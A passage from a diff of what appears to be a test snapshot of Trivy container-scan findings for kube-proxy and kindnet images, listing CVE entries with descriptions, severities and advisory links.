"https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", + ], + }, + "category": "Vulnerability", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", + ], + }, + "category": "Vulnerability", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "coreutils: race condition vulnerability in chown and chgrp", + "references": [ { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.19.8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.19.7", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Dpkg::Source::Archive in dpkg, the Debian package management system, b ...", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-1664", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://lists.debian.org/debian-security-announce/2022/msg00115.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://security.netapp.com/advisory/ntap-20221007-0002/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://ubuntu.com/security/notices/USN-5446-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://ubuntu.com/security/notices/USN-5446-2", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", + ], + }, + "category": "Vulnerability", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "gcc-8-base", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.16.0+incompatible", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-1996", - "installedVersion": "v2.9.5+incompatible", - "packageName": "github.com/emicklei/go-restful", + "fixedVersion": "2.2.12-1+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-34903", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1996", - "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", - "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", - "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", - "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", - "https://github.com/emicklei/go-restful/issues/489", - "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", - "https://pkg.go.dev/vuln/GO-2022-0619", - "https://security.netapp.com/advisory/ntap-20220923-0005/", - "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "https://access.redhat.com/errata/RHSA-2022:6602", + "https://access.redhat.com/security/cve/CVE-2022-34903", + "https://bugs.debian.org/1014157", + "https://bugzilla.redhat.com/2102868", + "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "https://dev.gnupg.org/T6027", + "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "https://errata.rockylinux.org/RLSA-2022:6602", + "https://linux.oracle.com/cve/CVE-2022-34903.html", + "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "https://security.netapp.com/advisory/ntap-20220826-0005/", + "https://ubuntu.com/security/notices/USN-5503-1", + "https://ubuntu.com/security/notices/USN-5503-2", + "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "https://www.debian.org/security/2022/dsa-5174", + "https://www.openwall.com/lists/oss-security/2022/06/30/1", ], }, "category": "Vulnerability", - "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Authorization Bypass Through User-Controlled Key", + "name": "Signature spoofing via status line injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1996", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1996", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", - }, - { - "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "value": "https://avd.aquasec.com/nvd/cve-2022-34903", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "value": "https://access.redhat.com/errata/RHSA-2022:6602", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/issues/489", + "value": "https://access.redhat.com/security/cve/CVE-2022-34903", }, { "type": "URL", - "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "value": "https://bugs.debian.org/1014157", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "value": "https://bugzilla.redhat.com/2102868", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "value": "https://dev.gnupg.org/T6027", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://errata.rockylinux.org/RLSA-2022:6602", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0619", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://ubuntu.com/security/notices/USN-5503-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://ubuntu.com/security/notices/USN-5503-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://www.debian.org/security/2022/dsa-5174", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-14855", + "installedVersion": "2.2.12-1+deb10u1", + "packageName": "gpgv", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-14855", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "https://dev.gnupg.org/T4755", + "https://eprint.iacr.org/2020/014.pdf", + "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "https://ubuntu.com/security/notices/USN-4516-1", + "https://usn.ubuntu.com/4516-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-14855", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://avd.aquasec.com/nvd/cve-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://access.redhat.com/security/cve/CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://dev.gnupg.org/T4755", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://eprint.iacr.org/2020/014.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": 